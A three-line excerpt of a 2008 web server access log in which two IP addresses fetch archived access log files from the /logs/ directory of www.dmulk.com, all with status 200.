86.143.10.239 - - [16/Jan/2008:15:24:17 -0800] "GET /logs/access_070928.log HTTP/1.1" 200 16581 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
86.143.10.239 - - [16/Jan/2008:15:24:18 -0800] "GET /logs/access_071128.log HTTP/1.1" 200 458752 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
194.72.9.25 - - [16/Jan/2008:15:24:19 -0800] "GET /logs/access_070703.log HTTP/1.1" 200 22875 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET" "www.dmulk.com"
